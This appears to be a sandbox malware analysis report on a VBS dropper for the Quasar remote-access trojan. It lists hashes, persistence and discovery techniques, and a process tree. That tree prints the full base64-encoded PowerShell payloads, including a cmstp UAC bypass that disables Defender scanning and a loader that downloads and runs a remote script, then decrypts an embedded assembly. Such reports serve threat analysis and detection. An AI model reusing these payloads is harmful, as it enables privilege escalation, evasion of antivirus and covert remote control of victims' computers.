quasar | 027ff65365c4f69731be566e541127a63d993d26f68738a462ec63b667226990

Analysis

max time kernel
94s
max time network
132s
platform
windows10-2004_x64
resource
win10v2004-20250129-en
resource tags

arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
submitted
31/01/2025, 03:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

027ff65365c4f69731be566e541127a63d993d26f68738a462ec63b667226990.vbs
Size

275KB
MD5

3036e9c4718042d10f79bfff33890123
SHA1

506e3824f97a346ebfac946aaf19b13defa80cac
SHA256

027ff65365c4f69731be566e541127a63d993d26f68738a462ec63b667226990
SHA512

6cc407e53f5057a3469dc4cd62586cfa740339adcde218ef54446e9af75165aa08bbc088ec9f02015334c4f9abd4e3d69db4eb2ced0c66e8f8e3e1b1f4e70ebc
SSDEEP

3072:S9bhZuU+jd2EOHov4nc8b5tBuyAUvmSWBQ0MY5abVt+/710ROsvTkRoaDSyav3DW:CbhAZd2EOdTN7vrV0M2abV4jaTbwDEC

Score

10^/10

quasar discovery execution persistence spyware trojan

Malware Config

Extracted

Family

quasar

Attributes

reconnect_delay
3000

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral2/memory/972-102-0x0000000007E00000-0x0000000007E5E000-memory.dmp	family_quasar

Blocklisted process makes network request 2 IoCs

flow	pid	Process
17	972	powershell.exe
20	972	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2760	powershell.exe
4944	powershell.exe
972	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 1 IoCs

pid	Process
1760	Chromesa.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate_534 = "wscript.exe \"C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate_427.vbs\""	powershell.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
19	ip-api.com

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Chromesa.exe

Kills process with taskkill 1 IoCs

defense_evasion

pid	Process
2508	taskkill.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2128	schtasks.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2760	powershell.exe
2760	powershell.exe
4944	powershell.exe
4944	powershell.exe
972	powershell.exe
972	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2760	powershell.exe
Token: SeDebugPrivilege	4944	powershell.exe
Token: SeDebugPrivilege	2508	taskkill.exe
Token: SeDebugPrivilege	972	powershell.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 3124 wrote to memory of 436	3124	WScript.exe	84
PID 3124 wrote to memory of 436	3124	WScript.exe	84
PID 436 wrote to memory of 3296	436	cmd.exe	86
PID 436 wrote to memory of 3296	436	cmd.exe	86
PID 3296 wrote to memory of 2760	3296	cmd.exe	88
PID 3296 wrote to memory of 2760	3296	cmd.exe	88
PID 2760 wrote to memory of 3848	2760	powershell.exe	92
PID 2760 wrote to memory of 3848	2760	powershell.exe	92
PID 3848 wrote to memory of 4564	3848	csc.exe	93
PID 3848 wrote to memory of 4564	3848	csc.exe	93
PID 2760 wrote to memory of 4524	2760	powershell.exe	94
PID 2760 wrote to memory of 4524	2760	powershell.exe	94
PID 3296 wrote to memory of 972	3296	cmd.exe	100
PID 3296 wrote to memory of 972	3296	cmd.exe	100
PID 3296 wrote to memory of 972	3296	cmd.exe	100
PID 972 wrote to memory of 2128	972	powershell.exe	102
PID 972 wrote to memory of 2128	972	powershell.exe	102
PID 972 wrote to memory of 2128	972	powershell.exe	102
PID 972 wrote to memory of 1760	972	powershell.exe	104
PID 972 wrote to memory of 1760	972	powershell.exe	104
PID 972 wrote to memory of 1760	972	powershell.exe	104

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\027ff65365c4f69731be566e541127a63d993d26f68738a462ec63b667226990.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\c.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3296
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -noprofile -windowStyle Hidden -ep bypass -command "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gcmFuZG9tWFlaLUludm9rZS1VQUMgewoKCnBhcmFtKAogICAgW1BhcmFtZXRlcihNYW5kYXRvcnkgPSAkdHJ1ZSldCiAgICBbc3RyaW5nXSRyYW5kb21YWVpFeGVjdXRhYmxlLAogCiAgICBbUGFyYW1ldGVyKCldCiAgICBbc3RyaW5nXSRyYW5kb21YWVpDb21tYW5kCikKCiRyYW5kb21YWVpJbmZEYXRhID0gQCcKW3ZlcnNpb25dClNpZ25hdHVyZT0kY2hpY2FnbyQKQWR2YW5jZWRJTkY9Mi41CgpbRGVmYXVsdEluc3RhbGxdCkN1c3RvbURlc3RpbmF0aW9uPXJhbmRvbVhZWi1DdXN0SW5zdERlc3RTZWN0aW9uQWxsVXNlcnMKUnVuUHJlU2V0dXBDb21tYW5kcz1yYW5kb21YWVotUnVuUHJlU2V0dXBDb21tYW5kc1NlY3Rpb24KCltyYW5kb21YWVotUnVuUHJlU2V0dXBDb21tYW5kc1NlY3Rpb25dCkxJTkUKdGFza2tpbGwgL0lNIGNtc3RwLmV4ZSAvRgoKW3JhbmRvbVhZWi1DdXN0SW5zdERlc3RTZWN0aW9uQWxsVXNlcnNdCjQ5MDAwLDQ5MDAxPXJhbmRvbVhZWi1BbGxVU2VyX0xESURTZWN0aW9uLCA3CgpbcmFuZG9tWFlaLUFsbFVTZXJfTERJRFNlY3Rpb25dCiJIS0xNIiwgIlNPRlRXQVJFXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXEFwcCBQYXRoc1xDTU1HUjMyLkVYRSIsICJQcm9maWxlSW5zdGFsbFBhdGgiLCAiJVVuZXhwZWN0ZWRFcnJvciUiLCAiIgoKW1N0cmluZ3NdClNlcnZpY2VOYW1lPSJyYW5kb21YWVpWUE4iClNob3J0U3ZjTmFtZT0icmFuZG9tWFlaVlBOIgonQAoKJHJhbmRvbVhZWkNvZGUgPSBAIgp1c2luZyBTeXN0ZW07CnVzaW5nIFN5c3RlbS5UaHJlYWRpbmc7CnVzaW5nIFN5c3RlbS5UZXh0Owp1c2luZyBTeXN0ZW0uSU87CnVzaW5nIFN5c3RlbS5EaWFnbm9zdGljczsKdXNpbmcgU3lzdGVtLkNvbXBvbmVudE1vZGVsOwp1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7CgpwdWJsaWMgY2xhc3MgcmFuZG9tWFlaQ01TVFBCeXBhc3MKewogICAgW0RsbEltcG9ydCgiU2hlbGwzMi5kbGwiLCBDaGFyU2V0ID0gQ2hhclNldC5BdXRvLCBTZXRMYXN0RXJyb3IgPSB0cnVlKV0KICAgIHN0YXRpYyBleHRlcm4gSW50UHRyIFNoZWxsRXhlY3V0ZShJbnRQdHIgaHduZCwgc3RyaW5nIGxwT3BlcmF0aW9uLCBzdHJpbmcgbHBGaWxlLCBzdHJpbmcgbHBQYXJhbWV0ZXJzLCBzdHJpbmcgbHBEaXJlY3RvcnksIGludCBuU2hvd0NtZCk7CgogICAgW0RsbEltcG9ydCgidXNlcjMyLmRsbCIpXQogICAgc3RhdGljIGV4dGVybiBJbnRQdHIgRmluZFdpbmRvdyhzdHJpbmcgbHBDbGFzc05hbWUsIHN0cmluZyBscFdpbmRvd05hbWUpOwoKICAgIFtEbGxJbXBvcnQoInVzZXIzMi5kbGwiKV0KICAgIHN0YXRpYyBleHRlcm4gYm9vbCBQb3N0TWVzc2FnZShJbnRQdHIgaFduZCwgdWludCBNc2csIGludCB3UGFyYW0sIGludCBsUGFyYW0pOwoKICAgIHB1YmxpYyBzdGF0aWMgc3RyaW5nIEJpbmFyeVBhdGggPSAiYzpcXHdpbmRvd3NcXHN5c3RlbTMyXFxjbXN0cC5leGUiOwoKICAgIHB1YmxpYyBzdGF0aWMgc3RyaW5nIFNldEluZkZpbGUoc3RyaW5nIENvbW1hbmRUb0V4ZWN1dGUsIHN0cmluZyBJbmZEYXRhKQogICAgewogICAgICAgIFN0cmluZ0J1aWxkZXIgT3V0cHV0RmlsZSA9IG5ldyBTdHJpbmdCdWlsZGVyKCk7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoIkM6XFx3aW5kb3dzXFx0ZW1wIik7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoIlxcIik7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoUGF0aC5HZXRSYW5kb21GaWxlTmFtZSgpLlNwbGl0KENvbnZlcnQuVG9DaGFyKCIuIikpWzBdKTsKICAgICAgICBPdXRwdXRGaWxlLkFwcGVuZCgiLmluZiIpOwogICAgICAgIFN0cmluZ0J1aWxkZXIgbmV3SW5mRGF0YSA9IG5ldyBTdHJpbmdCdWlsZGVyKEluZkRhdGEpOwogICAgICAgIG5ld0luZkRhdGEuUmVwbGFjZSgiTElORSIsIENvbW1hbmRUb0V4ZWN1dGUpOwogICAgICAgIEZpbGUuV3JpdGVBbGxUZXh0KE91dHB1dEZpbGUuVG9TdHJpbmcoKSwgbmV3SW5mRGF0YS5Ub1N0cmluZygpKTsKICAgICAgICByZXR1cm4gT3V0cHV0RmlsZS5Ub1N0cmluZygpOwogICAgfQoKICAgIHB1YmxpYyBzdGF0aWMgYm9vbCByYW5kb21YWVpFeGVjdXRlKHN0cmluZyBDb21tYW5kVG9FeGVjdXRlLCBzdHJpbmcgSW5mRGF0YSkKICAgIHsKICAgICAgICBjb25zdCBpbnQgV01fU1lTS0VZRE9XTiA9IDB4MDEwMDsKICAgICAgICBjb25zdCBpbnQgVktfUkVUVVJOID0gMHgwRDsKCiAgICAgICAgU3RyaW5nQnVpbGRlciBJbmZGaWxlID0gbmV3IFN0cmluZ0J1aWxkZXIoKTsKICAgICAgICBJbmZGaWxlLkFwcGVuZChTZXRJbmZGaWxlKENvbW1hbmRUb0V4ZWN1dGUsIEluZkRhdGEpKTsKCiAgICAgICAgUHJvY2Vzc1N0YXJ0SW5mbyBzdGFydEluZm8gPSBuZXcgUHJvY2Vzc1N0YXJ0SW5mbyhCaW5hcnlQYXRoKTsKICAgICAgICBzdGFydEluZm8uQXJndW1lbnRzID0gIi9hdSAiICsgSW5mRmlsZS5Ub1N0cmluZygpOwogICAgICAgIHN0YXJ0SW5mby5XaW5kb3dTdHlsZSA9IFByb2Nlc3NXaW5kb3dTdHlsZS5IaWRkZW47ICAvLyBIaWRkZW4gd2luZG93CiAgICAgICAgSW50UHRyIGRwdHIgPSBNYXJzaGFsLkFsbG9jSEdsb2JhbCgxKTsKICAgICAgICBTaGVsbEV4ZWN1dGUoZHB0ciwgIiIsIEJpbmFyeVBhdGgsIHN0YXJ0SW5mby5Bcmd1bWVudHMsICIiLCAwKTsKCiAgICAgICAgVGhyZWFkLlNsZWVwKDMwMDApOwogICAgICAgIEludFB0ciBXaW5kb3dUb0ZpbmQgPSBGaW5kV2luZG93KG51bGwsICJyYW5kb21YWVpWUE4iKTsKCiAgICAgICAgUG9zdE1lc3NhZ2UoV2luZG93VG9GaW5kLCBXTV9TWVNLRVlET1dOLCBWS19SRVRVUk4sIDApOwogICAgICAgIFRocmVhZC5TbGVlcCg1MDAwKTsKICAgICAgICBGaWxlLkRlbGV0ZShJbmZGaWxlLlRvU3RyaW5nKCkpOwogICAgICAgIHJldHVybiB0cnVlOwogICAgfQp9CiJACgokcmFuZG9tWFlaQ29uc2VudFByb21wdCA9IChHZXQtSXRlbVByb3BlcnR5IEhLTE06XFNPRlRXQVJFXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXFBvbGljaWVzXFN5c3RlbSkuQ29uc2VudFByb21wdEJlaGF2aW9yQWRtaW4KJHJhbmRvbVhZWlNlY3VyZURlc2t0b3BQcm9tcHQgPSAoR2V0LUl0ZW1Qcm9wZXJ0eSBIS0xNOlxTT0ZUV0FSRVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxQb2xpY2llc1xTeXN0ZW0pLlByb21wdE9uU2VjdXJlRGVza3RvcAppZiAoJHJhbmRvbVhZWkNvbnNlbnRQcm9tcHQgLUVxIDIgLWFuZCAkcmFuZG9tWFlaU2VjdXJlRGVza3RvcFByb21wdCAtRXEgMSkgewogICAgcmV0dXJuCn0KCnRyeSB7CiAgICAkcmFuZG9tWFlaVXNlciA9IFtTeXN0ZW0uU2VjdXJpdHkuUHJpbmNpcGFsLldpbmRvd3NJZGVudGl0eV06OkdldEN1cnJlbnQoKS5OYW1lCiAgICAkcmFuZG9tWFlaQWRtID0gR2V0LUxvY2FsR3JvdXBNZW1iZXIgLVNJRCBTLTEtNS0zMi01NDQgfCBXaGVyZS1PYmplY3QgeyAkXy5OYW1lIC1lcSAkcmFuZG9tWFlaVXNlciB9Cn0gY2F0Y2ggewogICAgJHJhbmRvbVhZWlVzZXIgPSBbU3lzdGVtLlNlY3VyaXR5LlByaW5jaXBhbC5XaW5kb3dzSWRlbnRpdHldOjpHZXRDdXJyZW50KCkuTmFtZQogICAgJHJhbmRvbVhZWkFkbWluR3JvdXBTSUQgPSAnUy0xLTUtMzItNTQ0JwogICAgJHJhbmRvbVhZWkFkbWluR3JvdXAgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9Hcm91cCB8IFdoZXJlLU9iamVjdCB7ICRfLlNJRCAtZXEgJHJhbmRvbVhZWkFkbWluR3JvdXBTSUQgfQogICAgJHJhbmRvbVhZWk1lbWJlcnMgPSAkcmFuZG9tWFlaQWRtaW5Hcm91cC5HZXRSZWxhdGVkKCJXaW4zMl9Vc2VyQWNjb3VudCIpCiAgICAkcmFuZG9tWFlaTWVtYmVycyB8IEZvckVhY2gtT2JqZWN0IHsgaWYgKCRfLkNhcHRpb24gLWVxICRyYW5kb21YWVpVc2VyKSB7ICRyYW5kb21YWVpBZG0gPSAkdHJ1ZSB9IH0KfQoKaWYgKCEkcmFuZG9tWFlaQWRtKSB7CiAgICByZXR1cm4KfQoKdHJ5IHsKICAgIGlmICghW1N5c3RlbS5JTy5GaWxlXTo6RXhpc3RzKCRyYW5kb21YWVpFeGVjdXRhYmxlKSkgewogICAgICAgICRyYW5kb21YWVpFeCA9IChHZXQtQ29tbWFuZCAkcmFuZG9tWFlaRXhlY3V0YWJsZSkKICAgICAgICBpZiAoIVtTeXN0ZW0uSU8uRmlsZV06OkV4aXN0cygkcmFuZG9tWFlaRXguU291cmNlKSkgewogICAgICAgICAgICAkcmFuZG9tWFlaRXhlY3V0YWJsZSA9ICRFeGVjdXRpb25Db250ZXh0LlNlc3Npb25TdGF0ZS5QYXRoLkdldFVucmVzb2x2ZWRQcm92aWRlclBhdGhGcm9tUFNQYXRoKCRyYW5kb21YWVpFeGVjdXRhYmxlKQogICAgICAgICAgICBpZiAoIVtTeXN0ZW0uSU8uRmlsZV06OkV4aXN0cygkcmFuZG9tWFlaRXhlY3V0YWJsZSkpIHsKICAgICAgICAgICAgICAgIHJldHVybgogICAgICAgICAgICB9CiAgICAgICAgfSBlbHNlIHsKICAgICAgICAgICAgJHJhbmRvbVhZWkV4ZWN1dGFibGUgPSAoR2V0LUNvbW1hbmQgJHJhbmRvbVhZWkV4ZWN1dGFibGUpLk5hbWUKICAgICAgICB9CiAgICB9Cn0gY2F0Y2ggewogICAgcmV0dXJuCn0KCmlmICgkcmFuZG9tWFlaRXhlY3V0YWJsZS5Db250YWlucygicG93ZXJzaGVsbCIpKSB7CiAgICBpZiAoJHJhbmRvbVhZWkNvbW1hbmQgLW5lICIiKSB7CiAgICAgICAgJHJhbmRvbVhZWkZpbmFsID0gInBvd2Vyc2hlbGwgLVdpbmRvd1N0eWxlIEhpZGRlbiAtYyAiIiRyYW5kb21YWVpDb21tYW5kIiIiCiAgICB9IGVsc2UgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKICAgIH0KfSBlbHNlaWYgKCRyYW5kb21YWVpFeGVjdXRhYmxlLkNvbnRhaW5zKCJjbWQiKSkgewogICAgaWYgKCRyYW5kb21YWVpDb21tYW5kIC1uZSAiIikgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICJjbWQgL2MgIiIkcmFuZG9tWFlaQ29tbWFuZCIiIiAgIyBDaGFuZ2VkIHRvIC9jIHRvIGNsb3NlIHRoZSBjbWQgd2luZG93CiAgICB9IGVsc2UgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKICAgIH0KfSBlbHNlIHsKICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKfQoKZnVuY3Rpb24gcmFuZG9tWFlaRXhlY3V0ZSB7CiAgICB0cnkgewogICAgICAgICRyYW5kb21YWVpSZXN1bHQgPSBbcmFuZG9tWFlaQ01TVFBCeXBhc3NdOjpyYW5kb21YWVpFeGVjdXRlKCRyYW5kb21YWVpGaW5hbCwgJHJhbmRvbVhZWkluZkRhdGEpCiAgICB9IGNhdGNoIHsKICAgICAgICBBZGQtVHlwZSAkcmFuZG9tWFlaQ29kZQogICAgICAgICRyYW5kb21YWVpSZXN1bHQgPSBbcmFuZG9tWFlaQ01TVFBCeXBhc3NdOjpyYW5kb21YWVpFeGVjdXRlKCRyYW5kb21YWVpGaW5hbCwgJHJhbmRvbVhZWkluZkRhdGEpCiAgICB9CgogICAgaWYgKCRyYW5kb21YWVpSZXN1bHQpIHsKICAgICAgICByZXR1cm4KICAgIH0gZWxzZSB7CiAgICAgICAgcmV0dXJuCiAgICB9Cn0KCiRyYW5kb21YWVpQcm9jZXNzID0gKChHZXQtV21pT2JqZWN0IC1DbGFzcyB3aW4zMl9wcm9jZXNzKS5uYW1lIHwgU2VsZWN0LVN0cmluZyAiY21zdHAiIHwgU2VsZWN0LU9iamVjdCAqIC1GaXJzdCAxKS5QYXR0ZXJuCmlmICgkcmFuZG9tWFlaUHJvY2VzcyAtZXEgImNtc3RwIikgewogICAgdHJ5IHsKICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgImNtc3RwIiAtRm9yY2UKICAgICAgICByYW5kb21YWVpFeGVjdXRlCiAgICB9IGNhdGNoIHsKICAgICAgICByZXR1cm4KICAgIH0KfSBlbHNlIHsKICAgIHJhbmRvbVhZWkV4ZWN1dGUKfQp9CgojIEZ1bmN0aW9uIENhbGwKcmFuZG9tWFlaLUludm9rZS1VQUMgLXJhbmRvbVhZWkV4ZWN1dGFibGUgInBvd2Vyc2hlbGwiIC1yYW5kb21YWVpDb21tYW5kICIuKCdBZGQtTXBQJyArICdyZWZlcmVuY2UnKSAtRXhjbHVzaW9uUGF0aCBDOlwgLUV4Y2x1c2lvblByb2Nlc3MgcG93ZXJzaGVsbC5leGUi')))"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2760
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yo4fh4jk\yo4fh4jk.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3848
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES90F5.tmp" "c:\Users\Admin\AppData\Local\Temp\yo4fh4jk\CSCBE11CDA968A74F3FAED0B4269BA7DED9.TMP"
        6⤵
        
        PID:4564
    - - C:\windows\system32\cmstp.exe
        
        "C:\windows\system32\cmstp.exe" /au C:\windows\temp\201iw2pa.inf
        5⤵
        
        PID:4524
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24gcnlidnBkaWdlYXN3ZXlwKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnbVowNURDVktVWDZxQ1RyQkRqbHIyZVBNMk9SZERkTnVSMFJQeVVrNFdPRT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ1llRm40L05LcVJjZFluZVN3azZFWHc9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gcWRuaW52d29meG1jbXRiKCRwYXJhbV92YXIpewlJRVggJyR3eXVqa2t5dmJwcG14Y2Zsem1kamJqaHFwPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHZrd3hjYXdtZGV0YnVuZnNpbXR5aXpsYW09TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRucWlrem1yZXRwYWN4eW9zenR5bGplenlyPU5ldy1PYmplY3QgU3lzdGVtLklPLkNBQkNvbUFCQ3ByQUJDZUFCQ3NzQUJDaW9BQkNuLkFCQ0daQUJDaXBBQkNTdEFCQ3JlQUJDYW1BQkMoJHd5dWpra3l2YnBwbXhjZmx6bWRqYmpocXAsIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJG5xaWt6bXJldHBhY3h5b3N6dHlsamV6eXIuQ29weVRvKCR2a3d4Y2F3bWRldGJ1bmZzaW10eWl6bGFtKTsJJG5xaWt6bXJldHBhY3h5b3N6dHlsamV6eXIuRGlzcG9zZSgpOwkkd3l1amtreXZicHBteGNmbHptZGpiamhxcC5EaXNwb3NlKCk7CSR2a3d4Y2F3bWRldGJ1bmZzaW10eWl6bGFtLkRpc3Bvc2UoKTsJJHZrd3hjYXdtZGV0YnVuZnNpbXR5aXpsYW0uVG9BcnJheSgpO31mdW5jdGlvbiB0b3p1Y2lhcXFzeXRjZHhoZGt0emZ4cGVsKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewkJSUVYICckdHhucmd2eXZscGpuY2VyY3hheGVwbG5lZmlnbnBjaXJrdGdwZG1tdT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGJnbWpmZXhvZ2lsZGJ0YmlraW14b2xnaWdzZGl5Y3psb2NkanpkemJsc2dncWVwcnN4PSR0eG5yZ3Z5dmxwam5jZXJjeGF4ZXBsbmVmaWducGNpcmt0Z3BkbW11LkFCQ0VBQkNuQUJDdEFCQ3JBQkN5QUJDUEFCQ29BQkNpQUJDbkFCQ3RBQkM7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGJnbWpmZXhvZ2lsZGJ0YmlraW14b2xnaWdzZGl5Y3psb2NkanpkemJsc2dncWVwcnN4LkFCQ0lBQkNuQUJDdkFCQ29BQkNrQUJDZUFCQygkbnVsbCwgJHBhcmFtMl92YXIpOycuUmVwbGFjZSgnQUJDJywgJycpO30kZmhvc3B3b2FubHlodm1xY3h5cGNrdnB5ZyA9ICRlbnY6VVNFUk5BTUU7JG55b21iaWxvc2lsYmllc3RvenZiaWp1dGkgPSAnQzpcVXNlcnNcJyArICRmaG9zcHdvYW5seWh2bXFjeHlwY2t2cHlnICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnlvbWJpbG9zaWxiaWVzdG96dmJpanV0aTska2lvcnY9W1N5c3RlbS5JTy5GaWxlXTo6KCd0eGVUbGxBZGFlUidbLTEuLi0xMV0gLWpvaW4gJycpKCRueW9tYmlsb3NpbGJpZXN0b3p2YmlqdXRpKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkYXd4IGluICRraW9ydikgewlpZiAoJGF3eC5TdGFydHNXaXRoKCc6OicpKQl7CQkkZGR2ZHI9JGF3eC5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kbWx0dHd2a2JreWltcGhqdHl3amZ2ZnB1cz1bc3RyaW5nW11dJGRkdmRyLlNwbGl0KCdcJyk7SUVYICckeWZxeGltdG54ZWRja3JxemJycWFxcGZhZz1xZG5pbnZ3b2Z4bWNtdGIgKHJ5YnZwZGlnZWFzd2V5cCAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDcnRdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzZTZBQkM0QUJDU0FCQ3RBQkNyaUFCQ25BQkNnQUJDKCRtbHR0d3ZrYmt5aW1waGp0eXdqZnZmcHVzWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJHFvYWx1